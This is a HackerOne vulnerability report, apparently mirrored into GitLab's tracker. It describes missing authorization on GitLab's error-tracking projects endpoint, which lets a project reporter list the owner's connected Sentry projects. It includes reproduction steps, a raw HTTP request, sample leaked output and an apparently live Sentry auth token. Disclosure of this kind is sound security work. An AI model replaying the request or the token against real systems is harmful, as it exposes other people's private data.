A project reporter can leak owner's Sentry instance projects
HackerOne report #1947211 by js_noob
on 2023-04-14, assigned to @dcouture:
Report | Attachments | How To Reproduce
Report
Summary
Hello team, as a part of the project error tracking a user (owner or maintainer) can connect Sentry to GitLab to track different project errors. This step allows the "owner" to connect to Sentry to fetch the available projects, this should only be available to "owners", this can be done by clicking the Connect
button on Project Settings => Monitor => Error Tracking, checking the below screenshot. However, even a project reporter can fetch the connected Sentry instance projects.
Steps to reproduce
As an owner:
- Create a new ultimate trial group, and create a new project in that group
- Enable Sentry error tracking by going to https://gitlab.com/GROUP/PROJECT/-/settings/operations under Error tracking, you can use my Sentry instance, and choose any project in the drop-down:
* Sentry API URL:https://xyz-6jv.sentry.io/
* Auth Token:a6d9c60bd9254c19995af8f0502b6d9aa2412dd92e724204a8b948e52b87dfc1
- Invite a reporter to the project/group
As the reporter:
- Navigate to https://gitlab.com/GROUP/PROJECT/-/settings/operations and verify that you are blocked
- Send the following request, to grab all the Sentry instance projects. Change the
api_host
if you used your own instance
GET /GROUP/PROJECT/-/error_tracking/projects?api_host=https://xyz-6jv.sentry.io/&token=* HTTP/2
Host: gitlab.com
Cookie: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Csrf-Token: REDACTED
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
- The response should look similar to the one below, leaking all projects
{"projects":[{"id":"4505012306182144","name":"secret-project","status":"active","slug":"secret-project","organization_name":"XYZ","organization_id":"4505012227342336","organization_slug":"xyz-6jv"},{"id":"4505012228915200","name":"javascript","status":"active","slug":"javascript","organization_name":"XYZ","organization_id":"4505012227342336","organization_slug":"xyz-6jv"}]}
NB: I know that this exploitation requires knowing the sentry domain, there are a lot of ways that this can be done, a couple of examples if the reporter was a maintainer and was demoted or simply by brute force. However, the "real" bug/issue here is the missing authorization on -/error_tracking/projects
Video/POC
bandicam_2023-04-14_14-56-04-252.mp4
Impact
A project reporter can leak the owner's Sentry instance projects by knowing the domain without auth token.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: